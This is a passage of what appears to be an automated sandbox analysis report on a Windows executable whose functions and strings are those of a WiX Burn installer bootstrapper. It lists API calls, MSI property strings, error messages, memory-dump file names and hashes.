  • Part of subcall function 0080304F: GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00803609,00000000,?,00000000), ref: 00803069
  • Part of subcall function 0080304F: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,007EC025,?,007C5405,?,00000000,?), ref: 00803075
Similarity
• API ID: ErrorHandleInitLastModuleVariant
• String ID:
• API String ID: 52713655-0
APIs
• RegCloseKey.ADVAPI32(80070490,00000000,80070490,0082AAA0,00000000,80070490,?,?,007D8B19,WiX\Burn,PackageCache,00000000,0082AAA0,00000000,00000000,80070490), ref: 008058CA
  • Part of subcall function 008010B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 0080112B
  • Part of subcall function 008010B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00801163
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: QueryValue$Close
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1979452859-0
                                                                                                                                                              • Opcode ID: 6f0c5c63b527afc0c944248dc60cbea61656dcdfa531b13de65b8c60ad0a85bd
                                                                                                                                                              • Instruction ID: 06a33719688be77882e12b2e0d7193f5129314fa53c6540021e0a04e696fe4a3
                                                                                                                                                              • Opcode Fuzzy Hash: 6f0c5c63b527afc0c944248dc60cbea61656dcdfa531b13de65b8c60ad0a85bd
                                                                                                                                                              • Instruction Fuzzy Hash: BC11703680062EEFDB61AE98CD859AFBB69FF04320B258179ED41A7251C7314E50DFE1
                                                                                                                                                              APIs
                                                                                                                                                              • SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,00000104,00000000,?,007D8BD3,0000001C,80070490,00000000,00000000,80070490), ref: 007C34D5
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FolderPath
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1514166925-0
                                                                                                                                                              • Opcode ID: 532e58534940c2a6a0f0592dbda59e639c5ffcff59eb74ed3f2f7e0790bd8c81
                                                                                                                                                              • Instruction ID: 7cc1ba7f02961ca069deba5f092ed39ce9f480e16a372ed445fe9bdfef18733f
                                                                                                                                                              • Opcode Fuzzy Hash: 532e58534940c2a6a0f0592dbda59e639c5ffcff59eb74ed3f2f7e0790bd8c81
                                                                                                                                                              • Instruction Fuzzy Hash: 58E012B22012247BE6422E615C09EBB7B9CAF05364700806DFE40D6111E76AEA5097B0
                                                                                                                                                              APIs
                                                                                                                                                              • FreeLibrary.KERNELBASE(00000000,00000000,007C556E,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00802F0B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3664257935-0
                                                                                                                                                              • Opcode ID: df9303550cff90d29869dc2b1a513c76c680a0ebad26b43e3adb1e21c6273353
                                                                                                                                                              • Instruction ID: 5edacaaba72335ec2b126504bcfcf4fcd352bc88f99a4a520b9d080c3df2fd87
                                                                                                                                                              • Opcode Fuzzy Hash: df9303550cff90d29869dc2b1a513c76c680a0ebad26b43e3adb1e21c6273353
                                                                                                                                                              • Instruction Fuzzy Hash: 0CE0F6F1927625DECB608F69BD444427BB8FB28B40304820BB804D2220C7B054438FE0
                                                                                                                                                              APIs
                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0080966B
                                                                                                                                                                • Part of subcall function 0080998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00809A09
                                                                                                                                                                • Part of subcall function 0080998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00809A1A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                              • Opcode ID: a4d083620c5b915b127558c4716360b93f3530475d9518ce4f7bfa18e78c72b0
                                                                                                                                                              • Instruction ID: 158681e47677f102a7e194a6afcedba07431c1a2b727fde6197a4f13f8b373fc
                                                                                                                                                              • Opcode Fuzzy Hash: a4d083620c5b915b127558c4716360b93f3530475d9518ce4f7bfa18e78c72b0
                                                                                                                                                              • Instruction Fuzzy Hash: 1BB01291269211EDBECC51893E43C37090CFEC1F11731811EF0A1D12D2E8850CC50133
                                                                                                                                                              APIs
                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0080966B
                                                                                                                                                                • Part of subcall function 0080998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00809A09
                                                                                                                                                                • Part of subcall function 0080998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00809A1A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                              • Opcode ID: fa7b05602f6c1dfa1b9b4c7977264ba016023f4dbab10d89cc8f3c6b785135fa
                                                                                                                                                              • Instruction ID: d3170246bf15e8d1825ea2421c3521073799ee2775efe5b17612442bc550a3f1
                                                                                                                                                              • Opcode Fuzzy Hash: fa7b05602f6c1dfa1b9b4c7977264ba016023f4dbab10d89cc8f3c6b785135fa
                                                                                                                                                              • Instruction Fuzzy Hash: CDB01291269115FDBE8C11457C82C37090CFEC0F11731C11EF0A1E01D2A8800CC40233
                                                                                                                                                              APIs
                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0080966B
                                                                                                                                                                • Part of subcall function 0080998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00809A09
                                                                                                                                                                • Part of subcall function 0080998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00809A1A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                              • Opcode ID: cff6473c8a5ad4f7bb132b8bf0fb8a05e974c217531cb07633afb1a2f62bc229
                                                                                                                                                              • Instruction ID: 02183c69dc6ffb48d6818a550efda812152e461c06d2d91fe30615f97591864b
                                                                                                                                                              • Opcode Fuzzy Hash: cff6473c8a5ad4f7bb132b8bf0fb8a05e974c217531cb07633afb1a2f62bc229
                                                                                                                                                              • Instruction Fuzzy Hash: 97B01291269012EDBACC51493C03C370A0CFAC0B11331C11EF4A1C12D2E8810CC84133
                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenW.KERNEL32(00000000,00000000,00000000,?,?,007C21A8,?,00000000,?,00000000,?,007C390C,00000000,?,00000104), ref: 007C14E8
                                                                                                                                                                • Part of subcall function 007C3BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,007C21CC,000001C7,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3BDB
                                                                                                                                                                • Part of subcall function 007C3BD3: HeapSize.KERNEL32(00000000,?,007C21CC,000001C7,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3BE2
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$ProcessSizelstrlen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3492610842-0
                                                                                                                                                              • Opcode ID: 692cebbbb50460d331de5034f0f0f5c0d5e186ac4ca3ef423c2bf348492ac41e
                                                                                                                                                              • Instruction ID: e59bbf8bea544233ae234e04377cc79a6150662c0d3441e89646b3a78d495bb4
                                                                                                                                                              • Opcode Fuzzy Hash: 692cebbbb50460d331de5034f0f0f5c0d5e186ac4ca3ef423c2bf348492ac41e
                                                                                                                                                              • Instruction Fuzzy Hash: 4301F933200218EBCF115E54EC84F9A7765AF86760FA1823DFA165B253D639DD108690
                                                                                                                                                              APIs
                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 007CB11C
                                                                                                                                                                • Part of subcall function 007C394F: GetProcessHeap.KERNEL32(?,000001C7,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3960
                                                                                                                                                                • Part of subcall function 007C394F: RtlAllocateHeap.NTDLL(00000000,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3967
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,0080CA9C,000000FF,DirectorySearch,000000FF,0080CA9C,Condition,feclient.dll,0080CA9C,Variable,?,0080CA9C,0080CA9C,?,?), ref: 007CAA29
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exists,000000FF,?,Type,?,?,Path,clbcatq.dll), ref: 007CAA7E
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,path,000000FF), ref: 007CAA9A
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,FileSearch,000000FF), ref: 007CAABE
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exists,000000FF,?,Type,?,?,Path,clbcatq.dll), ref: 007CAB11
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 007CAB2B
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,RegistrySearch,000000FF), ref: 007CAB53
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,HKCR,000000FF,?,Root,?), ref: 007CAB91
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,HKCU,000000FF), ref: 007CABB0
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,HKLM,000000FF), ref: 007CABCF
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exists,000000FF,?,Win64,msi.dll,?,Type,?,?,Value,version.dll,?), ref: 007CAC8D
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,value,000000FF), ref: 007CACA7
                                                                                                                                                                • Part of subcall function 008032F3: VariantInit.OLEAUT32(?), ref: 00803309
                                                                                                                                                                • Part of subcall function 008032F3: SysAllocString.OLEAUT32(?), ref: 00803325
                                                                                                                                                                • Part of subcall function 008032F3: VariantClear.OLEAUT32(?), ref: 008033AC
                                                                                                                                                                • Part of subcall function 008032F3: SysFreeString.OLEAUT32(00000000), ref: 008033B7
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,numeric,000000FF,?,VariableType,?,?,ExpandEnvironment,cabinet.dll), ref: 007CAD06
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,string,000000FF), ref: 007CAD28
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 007CAD48
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,directory,000000FF), ref: 007CAE20
                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 007CAFFE
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String$Compare$Free$HeapVariant$AllocAllocateClearInitProcess
                                                                                                                                                              • String ID: ComponentId$Condition$DirectorySearch$DirectorySearch|FileSearch|RegistrySearch|MsiComponentSearch|MsiProductSearch|MsiFeatureSearch$ET|$ExpandEnvironment$Failed to allocate memory for search structs.$Failed to get @ComponentId.$Failed to get @Condition.$Failed to get @ExpandEnvironment.$Failed to get @FeatureId.$Failed to get @Id.$Failed to get @Path.$Failed to get @ProductCode or @UpgradeCode.$Failed to get @ProductCode.$Failed to get @Root.$Failed to get @Type.$Failed to get @UpgradeCode.$Failed to get @Variable.$Failed to get @VariableType.$Failed to get Key attribute.$Failed to get Value attribute.$Failed to get Win64 attribute.$Failed to get next node.$Failed to get search node count.$Failed to select search nodes.$FeatureId$FileSearch$HKCR$HKCU$HKLM$HKU$Invalid value for @Root: %ls$Invalid value for @Type: %ls$Invalid value for @VariableType: %ls$Key$MsiComponentSearch$MsiFeatureSearch$MsiProductSearch$Path$ProductCode$RegistrySearch$Root$Type$Unexpected element name: %ls$UpgradeCode$Value$Variable$VariableType$Win64$`<u$assignment$cabinet.dll$clbcatq.dll$comres.dll$directory$exists$feclient.dll$keyPath$language$msi.dll$numeric$path$search.cpp$state$string$value$version$version.dll$wininet.dll
                                                                                                                                                              • API String ID: 2748437055-1919346173
                                                                                                                                                              • Opcode ID: a35acc6e099f6eb6648314fcc92a0a2180f9aeea4b8c901e0539eabc52600bbd
                                                                                                                                                              • Instruction ID: 7468613f58d2fa344c2f5c07e2006b551748931e803f90744414b78ebd870015
                                                                                                                                                              • Opcode Fuzzy Hash: a35acc6e099f6eb6648314fcc92a0a2180f9aeea4b8c901e0539eabc52600bbd
                                                                                                                                                              • Instruction Fuzzy Hash: 59229371E4822ABADB619A948C47F6F7B68FB01734F20475CB930F62D0D778AE40D691
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to add obfuscated properties to argument string., xrefs: 007E4497
                                                                                                                                                              • WixBundleExecutePackageAction, xrefs: 007E43B7, 007E48B4
                                                                                                                                                              • Failed to add reinstall all property on minor upgrade., xrefs: 007E45EA
                                                                                                                                                              • %ls %ls=ALL, xrefs: 007E46B6, 007E4795
                                                                                                                                                              • REBOOT=ReallySuppress, xrefs: 007E45A0, 007E476C
                                                                                                                                                              • Failed to add reinstall mode and reboot suppression properties on minor upgrade., xrefs: 007E460C
                                                                                                                                                              • Failed to add feature action properties to argument string., xrefs: 007E44B9
                                                                                                                                                              • REINSTALLMODE="vomus" REBOOT=ReallySuppress, xrefs: 007E45F5
                                                                                                                                                              • Failed to uninstall MSI package., xrefs: 007E47EF
                                                                                                                                                              • msasn1.dll, xrefs: 007E440B
                                                                                                                                                              • Failed to add patch properties to argument string., xrefs: 007E44FD
                                                                                                                                                              • Failed to build MSI path., xrefs: 007E439D
                                                                                                                                                              • Failed to initialize external UI handler., xrefs: 007E43F4
                                                                                                                                                              • Failed to add reinstall mode and reboot suppression properties on repair., xrefs: 007E469B
                                                                                                                                                              • VersionString, xrefs: 007E428E, 007E42EF
                                                                                                                                                              • Failed to add patch properties to obfuscated argument string., xrefs: 007E451F
                                                                                                                                                              • Failed to add the list of dependencies to ignore to the properties., xrefs: 007E46CA
                                                                                                                                                              • Failed to add reboot suppression property on uninstall., xrefs: 007E477D
                                                                                                                                                              • Failed to install MSI package., xrefs: 007E4746
                                                                                                                                                              • %ls%ls REINSTALLMODE="cmus%ls" REBOOT=ReallySuppress, xrefs: 007E4687
                                                                                                                                                              • Failed to perform minor upgrade of MSI package., xrefs: 007E4638
                                                                                                                                                              • feclient.dll, xrefs: 007E42C5, 007E434D, 007E441D, 007E454B, 007E47D8
                                                                                                                                                              • Failed to add ADMIN property on admin install., xrefs: 007E471E
                                                                                                                                                              • REINSTALL=ALL, xrefs: 007E45D3, 007E464D
                                                                                                                                                              • ACTION=ADMIN, xrefs: 007E4709
                                                                                                                                                              • crypt32.dll, xrefs: 007E440A
                                                                                                                                                              • IGNOREDEPENDENCIES, xrefs: 007E46A5, 007E4784
                                                                                                                                                              • Failed to enable logging for package: %ls to: %ls, xrefs: 007E441F
                                                                                                                                                              • Failed to add reboot suppression property on install., xrefs: 007E45BB
                                                                                                                                                              • Failed to get cached path for package: %ls, xrefs: 007E434F
                                                                                                                                                              • WixBundleExecutePackageCacheFolder, xrefs: 007E436A, 007E48A4
                                                                                                                                                              • Failed to add feature action properties to obfuscated argument string., xrefs: 007E44DB
                                                                                                                                                              • Failed to run maintanance mode for MSI package., xrefs: 007E46F6
                                                                                                                                                              • Failed to add properties to argument string., xrefs: 007E4463
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: ACTION=ADMIN$ REBOOT=ReallySuppress$ REINSTALL=ALL$ REINSTALLMODE="vomus" REBOOT=ReallySuppress$%ls %ls=ALL$%ls%ls REINSTALLMODE="cmus%ls" REBOOT=ReallySuppress$Failed to add ADMIN property on admin install.$Failed to add feature action properties to argument string.$Failed to add feature action properties to obfuscated argument string.$Failed to add obfuscated properties to argument string.$Failed to add patch properties to argument string.$Failed to add patch properties to obfuscated argument string.$Failed to add properties to argument string.$Failed to add reboot suppression property on install.$Failed to add reboot suppression property on uninstall.$Failed to add reinstall all property on minor upgrade.$Failed to add reinstall mode and reboot suppression properties on minor upgrade.$Failed to add reinstall mode and reboot suppression properties on repair.$Failed to add the list of dependencies to ignore to the properties.$Failed to build MSI path.$Failed to enable logging for package: %ls to: %ls$Failed to get cached path for package: %ls$Failed to initialize external UI handler.$Failed to install MSI package.$Failed to perform minor upgrade of MSI package.$Failed to run maintanance mode for MSI package.$Failed to uninstall MSI package.$IGNOREDEPENDENCIES$VersionString$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$crypt32.dll$feclient.dll$msasn1.dll
                                                                                                                                                              • API String ID: 0-2033600224
                                                                                                                                                              • Opcode ID: 5ccb21101941ffc4824cbf8f28f13a248a6e5fb7896ec8e75c50d808fa2117e7
                                                                                                                                                              • Instruction ID: e0b52c3a3e50d017dad91d99ea958ba3e7031517d33471cd3e3c3ef1ed547e98
                                                                                                                                                              • Opcode Fuzzy Hash: 5ccb21101941ffc4824cbf8f28f13a248a6e5fb7896ec8e75c50d808fa2117e7
                                                                                                                                                              • Instruction Fuzzy Hash: 6602E171942665AFCB219F55CC85FA9B7BAFF58310F0001A5F918E7251C73AAEA0DF80
                                                                                                                                                              APIs
                                                                                                                                                              • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 008017B1
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008017BB
                                                                                                                                                              • CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,?), ref: 00801808
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0080180E
                                                                                                                                                              • CreateWellKnownSid.ADVAPI32(00000017,00000000,?,?), ref: 00801848
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0080184E
                                                                                                                                                              • CreateWellKnownSid.ADVAPI32(00000018,00000000,?,?), ref: 0080188E
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00801894
                                                                                                                                                              • CreateWellKnownSid.ADVAPI32(00000010,00000000,?,?), ref: 008018D4
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008018DA
                                                                                                                                                              • CreateWellKnownSid.ADVAPI32(00000016,00000000,?,?), ref: 0080191A
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00801920
                                                                                                                                                              • SetEntriesInAclA.ADVAPI32(00000005,?,00000000,?), ref: 00801A11
                                                                                                                                                              • SetSecurityDescriptorOwner.ADVAPI32(?,?,00000000), ref: 00801A4B
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00801A55
                                                                                                                                                              • SetSecurityDescriptorGroup.ADVAPI32(?,?,00000000), ref: 00801A8D
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00801A97
                                                                                                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00801AD0
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00801ADA
                                                                                                                                                              • CoInitializeSecurity.OLE32(?,000000FF,00000000,00000000,00000006,00000002,00000000,00003000,00000000), ref: 00801B18
                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 00801B2E
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$CreateKnownSecurityWell$Descriptor$Initialize$DaclEntriesFreeGroupLocalOwner
                                                                                                                                                              • String ID: srputil.cpp
                                                                                                                                                              • API String ID: 267631441-4105181634
                                                                                                                                                              • Opcode ID: cdb2e9fb0c53a82a82da40ff3004da5bd505eaa4232237adc58167d1a8d3afff
                                                                                                                                                              • Instruction ID: 61fb5bf3e54437a8e6abe056adcd4db39bd4c2854bf1aa3a6a39c31138fb89ad
                                                                                                                                                              • Opcode Fuzzy Hash: cdb2e9fb0c53a82a82da40ff3004da5bd505eaa4232237adc58167d1a8d3afff
                                                                                                                                                              • Instruction Fuzzy Hash: 4CC14576D4123DABDB718B968C49BDFFAB8FF44750F0141AAA905F7240E7749E408EA0
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to allocate memory for pseudo bundle payload hash., xrefs: 007EC4AD
                                                                                                                                                              • Failed to copy install arguments for related bundle package, xrefs: 007EC584
                                                                                                                                                              • Failed to copy uninstall arguments for related bundle package, xrefs: 007EC623
                                                                                                                                                              • Failed to copy filename for pseudo bundle., xrefs: 007EC417
                                                                                                                                                              • Failed to append relation type to install arguments for related bundle package, xrefs: 007EC5A9
                                                                                                                                                              • Failed to copy display name for pseudo bundle., xrefs: 007EC74F
                                                                                                                                                              • Failed to allocate memory for dependency providers., xrefs: 007EC6DE
                                                                                                                                                              • Failed to copy download source for pseudo bundle., xrefs: 007EC469
                                                                                                                                                              • Failed to copy local source path for pseudo bundle., xrefs: 007EC43B
                                                                                                                                                              • Failed to copy version for pseudo bundle., xrefs: 007EC72D
                                                                                                                                                              • pseudobundle.cpp, xrefs: 007EC379, 007EC3B2, 007EC4A1, 007EC6D2
                                                                                                                                                              • Failed to copy key for pseudo bundle., xrefs: 007EC542
                                                                                                                                                              • Failed to append relation type to repair arguments for related bundle package, xrefs: 007EC5F1
                                                                                                                                                              • Failed to copy key for pseudo bundle payload., xrefs: 007EC3F3
                                                                                                                                                              • Failed to allocate space for burn payload inside of related bundle struct, xrefs: 007EC3BE
                                                                                                                                                              • Failed to copy repair arguments for related bundle package, xrefs: 007EC5D0
                                                                                                                                                              • Failed to copy cache id for pseudo bundle., xrefs: 007EC55F
                                                                                                                                                              • Failed to append relation type to uninstall arguments for related bundle package, xrefs: 007EC644
                                                                                                                                                              • -%ls, xrefs: 007EC34C
                                                                                                                                                              • Failed to allocate space for burn package payload inside of related bundle struct, xrefs: 007EC385
